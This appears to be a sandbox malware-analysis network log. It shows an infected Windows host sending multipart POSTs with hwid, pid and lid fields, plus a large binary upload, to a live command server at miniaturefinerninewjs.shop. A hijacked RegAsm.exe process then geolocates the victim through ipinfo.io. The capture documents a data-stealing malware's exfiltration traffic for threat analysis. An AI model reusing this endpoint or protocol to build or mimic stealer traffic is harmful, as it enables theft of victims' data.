2024-05-06 05:54:14 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:54:14 UTC	5101	OUT	Data Raw: 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 Data Ascii: `M?lrQMn 64F6(X&7~`aO
2024-05-06 05:54:15 UTC	816	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u8g3hvf8n42m4lua1ghudakrvh; expires=Thu, 29-Aug-2024 23:40:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cBiD3TafjF7kFL4Et7Tc3sBbbO8tKC6XIlnQnT713BwXN4t4vdbOD9VXTOxVjl%2FD7nHZ6g7E4uI5VstU%2BF8EK0cvpOgI2Zn9VlFGHr8wn7bapJFKTwBJQKX6UprDX9is%2FSlqNhnhNZwy3iO1ag%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6e9c8427496-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:54:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49797	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:15 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 7079 Host: miniaturefinerninewjs.shop
2024-05-06 05:54:15 UTC	7079	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:54:15 UTC	810	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nbbg98el6j4jcneq9eq0qh01qd; expires=Thu, 29-Aug-2024 23:40:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yVnKDdY0uNn7UagqET9JnnDzBbquLuyMNeQXaTFutgVKLLd0pPlaAE7BiRLv9ZoUxHbCi6Iq2LNAEiEJ15ySWfLGTbtx6d28bLxDswR0QlRDpJ97cMXkGtPbDRyIUaWYsJzKapgJZSaOVUA9kA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6eeee65db1d-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:15 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:54:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49798	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:17 UTC	291	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1285 Host: miniaturefinerninewjs.shop
2024-05-06 05:54:17 UTC	1285	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:54:17 UTC	820	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=k2118jc8umee27jg0sfkb041t7; expires=Thu, 29-Aug-2024 23:40:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I5AYJ%2BP%2FJYar5n1PEBy8zHz7r1deZYkgiZabZY51qAmTRf6Na%2FSb9Ar6ec29ZuCgyLUvG7XRyxahtOKd63Fub6W5B%2BIfyEPaWb7affvVtZfT3Y4kRk%2FUb016i90I9eGXR5ONnzzUSfSfC1GLsA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b6f93ca831f5-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:17 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 34 2e 31 37 2e 34 30 2e 31 30 31 0d 0a Data Ascii: fok 84.17.40.101
2024-05-06 05:54:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49799	104.21.30.191	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:18 UTC	293	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 593152 Host: miniaturefinerninewjs.shop
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 31 35 43 39 38 39 30 31 45 45 46 34 30 30 35 44 32 36 34 45 31 33 31 46 46 36 31 44 33 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 38 4e 67 43 6c 2d 2d 0d 0a 2d 2d 62 Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"DF15C98901EEF4005D264E131FF61D32--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"H8NgCl----b
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: 82 1b c0 c2 33 87 40 e2 15 22 10 5c e3 67 e7 28 ae 05 98 f4 a4 b3 73 8e 03 9d f5 c4 ff d5 d5 ff 5e 6a 81 7b 71 0b 98 c5 80 28 63 6a b6 0f c2 69 05 c1 0e a6 41 b5 11 1a eb 11 cb ca 39 ea b9 03 c5 dd 4d 79 b0 33 1c ae 08 37 ba d0 4a 83 98 87 a5 7a 08 e0 4a 7c 8a 9d 0b 06 98 cb 2f 1f 33 0e 88 d8 91 66 57 2c 24 a7 02 53 77 6c 17 6a d0 bc 37 bf 24 06 ad 7c 33 62 09 75 48 b9 db 73 a1 f0 e1 4f b1 6f 16 27 54 78 93 1a 31 d4 0a 33 59 f5 41 58 a6 bb 10 c9 a9 78 53 85 45 98 fc f3 98 39 4a d2 56 9d 8f 93 3c a7 c6 5e 98 4b 5a 91 af e8 fe 27 f5 0c fd 90 10 99 44 6b 45 51 f9 37 a4 56 3a fd 60 bd 1d b9 ff 05 19 60 61 af 5f d0 da 56 a7 b0 62 8b f2 a7 3e a1 2c a4 81 8c b0 c6 1b 6e 6c 7b 28 16 0c d9 9f a8 29 53 b9 d6 68 9c 46 a5 b8 a1 df ec 50 87 ea fb de 0e 37 a5 ef 96 cb Data Ascii: 3@"\g(s^j{q(cjiA9My37JzJ\|/3fW,$Swlj7$\|3buHsOo'Tx13YAXxSE9JV<^KZ'DkEQ7V:``a_Vb>,nl{()ShFP7
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: 1f 5a 70 40 31 8d 20 e4 ea ca c8 55 53 5b 50 9f 63 ca b1 af cf 7f 9c 6f 0b a8 c2 26 54 1d c5 c2 86 cf 22 5b 24 e8 62 7f ea 35 5e 39 75 ad d8 18 63 0d 91 73 3c b2 ae 9d f9 f1 ae 78 2b 6b 49 18 b6 3c 61 d2 03 1a b5 90 80 1f 83 60 f8 46 f4 bf 7e 8c 17 2b 92 79 c3 8f de 6a 92 96 20 f3 4d 9f a8 05 07 3c 44 8e 34 b2 de 10 89 44 4b fe 69 92 95 a6 76 76 f9 cc bc 82 2d 03 a6 63 1e 54 f4 da 52 f5 a0 4e 91 9b fc d4 ea 00 e1 05 eb 45 e3 09 45 7e 23 1d 7e f5 3d 66 21 53 ad 4e dc 78 11 5a f2 0e 01 13 5b 65 6e bb c5 dd 0a 82 fa b0 79 6b 86 c8 d5 66 10 0a 78 b5 bf 3e a8 87 07 b8 63 fb 08 ea 2d 25 f8 3c fb 52 e0 91 7d 87 d2 bc 99 36 63 f9 3c 98 8f df 2d 2d a7 19 f3 d9 d0 36 9f 74 ec 79 d0 e6 60 f0 d2 ed 6f 46 93 03 ed eb 8c 62 cb fd 1d e7 58 92 e8 60 22 6f 5f 2d e3 31 5f Data Ascii: Zp@1 US[Pco&T"[$b5^9ucs<x+kI<a`F~+yj M<D4DKivv-cTRNEE~#~=f!SNxZ[enykfx>c-%<R}6c<--6ty`oFbX`"o_-1_
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: 15 c0 a2 1b 73 09 a2 e8 b7 fb 8b b1 f1 21 7b f7 17 bf 96 d9 7e 42 c6 0e 28 c4 c7 2b 8e d5 7f a1 79 83 dc 4a 0e 1a c8 ae 0e e7 eb d9 be 95 04 1d c6 59 5c 1f 58 6e 0a fc c5 92 fc b7 01 ca d9 31 67 01 e0 c0 68 9e 89 4a 60 c4 a8 4c 48 2e 37 7e c3 9b a9 3b f5 c5 0a f1 d0 02 33 30 7c f0 cc 59 7c 73 e2 35 51 b0 47 61 fb be 8f 1f f0 77 db 0c 3d ac 6e 4e 0a 70 8b 8f 37 f4 50 82 80 a0 d9 6e 23 b6 0c d2 64 cf 52 7b 27 a1 15 14 64 b1 4d 77 c9 0f ab 6f a3 99 d9 25 33 cf a1 b0 df ad f6 09 fa 2d f8 6a 38 88 22 5f b3 bd ff 94 f3 77 bb fd fe 6b 8f f5 51 8d 2a cf a3 a4 13 d3 0c 9c 60 90 13 b0 4f b0 c0 d0 53 59 a8 53 31 7a eb b8 b6 58 89 5b 5f af 32 22 34 48 e0 a1 6d e3 de dc 4b 9a 0d c9 ca 33 4f e4 1e ed 06 a7 ba b2 ed 6a 03 1e 5d 4c f4 79 69 76 60 41 1a f4 3e f4 34 41 cc Data Ascii: s!{~B(+yJY\Xn1ghJ`LH.7~;30\|Y\|s5QGaw=nNp7Pn#dR{'dMwo%3-j8"_wkQ*`OSYS1zX[_2"4HmK3Oj]Lyiv`A>4A
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: 3c b2 d4 ef ec 56 d6 96 d0 68 18 b5 fc 88 8f 3b 46 73 f1 2d 2e 93 34 dd fb 59 4d 23 c7 82 ed 57 7a 4d 67 e4 1d 1d af 2c 2f be f0 6d 5b 4d 67 b4 3d b4 ba db 9b fc fc a3 d1 cf 72 1e 52 da 6d f3 c5 ea 0f ea d6 de cc b9 13 59 16 55 13 ac da bb bb a4 29 2c f8 96 fa 70 4e ca ba 94 c2 07 6b 85 e7 ae 18 a6 df 0b 88 8d ac 0b 01 df c3 a1 f7 af ac 23 68 cb 0b 5d 5a f8 59 d9 ed 1f b6 bf 74 d0 d1 18 9e c5 b7 8a c5 35 5d b5 64 34 de f2 d4 95 fa e9 3d 5c a6 18 9d f4 41 ea ee c1 c7 47 d8 45 fe b0 33 a1 b9 16 08 1f 61 50 00 bf 61 a4 0a 7a a5 d2 8f 19 bb 0b db 1d 02 90 d7 01 71 91 ef b4 da 21 34 a0 8b 6f 95 26 26 13 ae 48 3e f4 86 01 54 bc 39 91 58 91 eb 97 8b 8e 29 91 c3 05 28 4e 73 05 f6 76 a2 66 e5 7c fa 0f fb 88 77 80 f8 97 2b fe f2 07 55 07 51 7b 77 07 f6 0c 09 7d 42 Data Ascii: <Vh;Fs-.4YM#WzMg,/m[Mg=rRmYU),pNk#h]ZYt5]d4=\AGE3aPazq!4o&&H>T9X)(Nsvf\|w+UQ{w}B
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: 53 d5 42 e1 4a e7 37 90 5a 8c 77 16 e9 ae 0f 91 f7 5a 3a 6f 48 bf 7e b5 de 56 14 34 b7 f0 ea 55 60 39 56 58 79 c1 f0 eb b6 11 04 b5 42 10 59 d0 a6 c3 42 3c bb e5 ae 1a 32 6c 10 cd bb e9 8c fb 9a 27 e6 2c d0 6a 5c ad c7 3a 4b c2 ef 21 ad 16 28 1d fd e2 0b c3 41 8e bc f7 fa 04 e9 aa d1 ec 49 3d fa 85 7c dc 90 ed cd e7 b6 3b 87 a5 19 c9 68 da dd dc 0f a4 d1 d0 a2 6a a8 51 42 8d 61 3b d3 e8 a7 87 3f d5 d5 59 fc 2c 20 0f 7f 54 1a 16 e5 f9 af 24 b7 d5 a0 86 8c a2 c0 06 bf 33 44 f0 0f 5f 9c c8 ad 0f b8 c8 41 44 29 2f f8 25 da c8 0c ad 89 6d 9e 31 f9 24 07 25 d6 e8 b6 b2 cf d2 33 08 31 4b 68 65 d6 d9 ae d4 b2 ad 2b ae 35 de 31 c5 78 8d c7 7c 19 c4 57 f4 78 c8 51 36 a8 fc c2 09 89 fe 00 61 dc 5b bf d8 a5 ad 9a 28 ca 8b ef 19 1e 5b f8 f9 f1 0d 45 3a 7a 3e c4 b3 a5 Data Ascii: SBJ7ZwZ:oH~V4U`9VXyBYB<2l',j\:K!(AI=\|;hjQBa;?Y, T$3D_AD)/%m1$%31Khe+51x\|WxQ6a[([E:z>
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: f4 98 3c 33 59 c4 06 f0 4c d1 04 59 00 40 ab 60 0b 0f f2 8f e3 a8 2d d5 94 a7 61 8c f1 3f b3 f9 f8 50 4a ec 1b f9 df bb e2 bf 04 ec 03 14 a0 2f b8 44 b8 c6 5e 73 12 5c c7 6f 28 b1 d0 4a a1 77 52 84 2e bb ae 16 09 51 cb d6 45 50 93 97 c8 d2 a2 bb 8f 9e eb 6e 08 e8 15 9b 9e 4b e3 53 3c 00 c9 8f 9e 4c af 60 62 19 c7 11 ea 09 ac 01 be 24 03 10 9c a3 05 07 67 ae d9 c0 96 e8 c6 25 f5 fe 66 af 08 9f 2b 62 a4 54 6a 8b 61 89 e5 b2 25 94 1a 16 d8 4b ca 5e a0 96 a0 56 2a 5d 85 57 f3 e6 cd 68 2f 42 c2 ba 05 bb 71 ed f7 82 f9 5b d7 ec 9b e3 be db 24 6d 3a 40 a9 5e 4b 37 78 d5 06 d3 87 0d fa 71 7a 51 03 31 cf 60 c7 17 11 b4 ad 94 81 67 e8 40 b9 8d 6b d1 f4 00 5d 00 6d ad 96 92 cb bd df 57 6d e6 6e 79 f5 02 fa 86 57 55 0b 44 e7 28 d2 d9 28 7a fc e6 dc 7b 25 94 7f c0 c7 Data Ascii: <3YLY@`-a?PJ/D^s\o(JwR.QEPnKS<L`b$g%f+bTja%K^V*]Wh/Bq[$m:@^K7xqzQ1`g@k]mWmnyWUD((z{%
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: da f3 df f3 0e 41 a6 75 8d f1 11 0f 39 bf f6 78 ea de 14 a7 bd 9f 0f 15 a0 94 bd fa 74 bb b8 8c bd fc 1f 59 78 d3 03 69 ab 31 dc 50 46 c3 04 a3 09 fa ef 69 c5 38 b7 26 d2 e1 f1 40 50 28 4f 53 7b f3 40 f7 f2 fa b1 6b 20 64 e3 04 b4 64 e6 6b 36 df cd d3 3d b9 49 e4 0f ac 78 da bf 97 ab 09 e3 39 65 b0 32 1b c9 ff 51 d5 fb 49 52 ac 66 c7 a5 e3 d5 7c 3e e6 37 1b 38 02 4e 88 64 ca 58 6d 4f d6 fa 67 7e fa a2 e7 96 09 4e 38 fd 02 38 89 1e 9a bb bb 67 79 a8 6b 40 ae d4 b4 e4 d3 e0 68 4d 05 2f d2 7f 88 cf 3b b0 8b c1 9a e8 94 aa da 9b ac b8 1f f0 46 12 a1 c2 71 bc 2e ef 67 97 a6 c1 5e 01 5f 45 76 79 22 6a 68 4f 70 f5 f6 c8 48 ca 85 6e d5 c8 88 8a 85 b0 32 86 80 1e d7 cf b8 c8 70 51 e9 8d 9d d8 7c 5e d3 ac b6 97 d2 13 37 c6 56 1c 0a ed 7a a7 58 b3 86 5f 77 64 a1 77 Data Ascii: Au9xtYxi1PFi8&@P(OS{@k ddk6=Ix9e2QIRf\|>78NdXmOg~N88gyk@hM/;Fq.g^_Evy"jhOpHn2pQ\|^7VzX_wdw
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: 25 72 65 96 1e e9 09 e4 ce 05 f0 3e 2c 76 19 c1 b6 ca 4e f3 f0 96 31 eb 79 46 f0 ed ba 60 7e f5 0a 2e 7e f3 92 0a 6e 94 ae b8 3a 16 fa 76 21 3b aa 2c f4 ea 49 1c 7b 7d 5b d4 c5 7c 9a 15 75 1b 34 ce c3 27 a2 b8 06 85 96 94 cf 93 47 85 e4 2e 22 1d f2 ea 52 ab 19 8a 98 9f a2 a4 42 d3 c3 4d 4e 64 03 0d 85 06 d3 78 a2 ce 18 38 cb 14 3e 76 91 d4 58 31 f4 f0 da e8 8f 1a f4 6a 5d d9 0d e8 a4 39 41 5f 70 3d 2f b5 cd 5d 96 ec b8 37 37 8c a7 49 80 83 29 de a8 a2 4b 64 0c 55 13 b4 29 14 16 f3 df a2 e1 53 52 09 af 54 5f 6f 2b 1d 90 20 58 98 65 4c a5 de e3 c9 28 4e bb 05 4a 5c cf b2 69 db 17 12 56 3f 27 4f 57 9d 80 a4 c2 5f fb e1 cf c1 7e 5e 1f a4 e9 23 4f e9 16 21 56 4d 8b 99 d1 f9 e6 db 05 27 9a 05 f5 b7 bb 80 8e f6 4a 53 16 8d 36 17 e7 ad e4 97 f8 94 1c 13 56 41 f3 Data Ascii: %re>,vN1yF`~.~n:v!;,I{}[\|u4'G."RBMNdx8>vX1j]9A_p=/]77I)KdU)SRT_o+ XeL(NJ\iV?'OW_~^#O!VM'JS6VA
2024-05-06 05:54:18 UTC	15331	OUT	Data Raw: f6 e6 6f 42 2c 5c 3b 9a 43 aa cd 5a 02 6e b1 3e 9e 5d c9 1d ab 98 74 29 ba 30 e3 ea 5a b1 51 b9 1a 7c 7e fb ed ed 19 c5 96 e3 43 bf be cd 7e 6e 69 af dc ca b5 96 69 d9 db 1e e5 a7 b9 42 eb 49 49 5b c8 b5 de 5e 76 e1 f9 5d 2a 3a 7b 5a 67 58 2b 9f dd d6 ff 2b 31 75 e1 0d 6d 61 22 67 f2 b5 c0 9e d4 d5 f3 b6 f5 5a 59 9b 24 ea 05 96 a1 bf e5 1f 91 c7 91 23 6f ca 5c df b4 f4 cf 19 74 50 eb f6 cf 6e 5c f5 e3 bc ac df 56 73 08 2a 97 e4 29 9d 7a 83 f6 7e 22 2c f7 40 ed 0a 36 ac 3c d2 d8 03 34 d7 3c 7c 48 ec 73 5a 4e 24 11 88 f9 c4 89 af 6c ab 71 47 17 f6 d7 a0 34 77 b8 3a f4 11 82 dd 19 c6 38 3e 97 52 6a 3d a7 59 2e 9b 3a 7b 86 66 8f a5 78 d5 3f de 88 8b 42 cf 0b d2 a6 d1 2f 79 df 94 b8 1c f0 98 87 98 43 76 16 c5 79 3b 8b 14 6b 9e d1 ea 3d 67 bd c0 50 2c 55 73 47 Data Ascii: oB,\;CZn>]t)0ZQ\|~C~niiBII[^v]:{ZgX++1uma"gZY$#o\tPn\Vs)z~",@6<4<\|HsZN$lqG4w:8>Rj=Y.:{fx?B/yCvy;k=gP,UsG
2024-05-06 05:54:20 UTC	818	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=s317trr8t84tgh6keh1alusde5; expires=Thu, 29-Aug-2024 23:40:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ZU2pYaUnH49NcafSPKNZRdXghaclHiQdkS742mYbTc1bmTP6SUkZJyXPAZNvRF3CQfwNNXt0ytirSF2wma08l0INID6mm3M09b8SnkdTAnJDvsxKtqHjF%2BPdQoGhvXTKX9SU%2F4e%2F23%2FdFHdmg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b703097ab3bb-MIA alt-svc: h3=":443"; ma=86400

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49802	34.117.186.192	443	796	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:28 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:28 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 3 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:28 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", 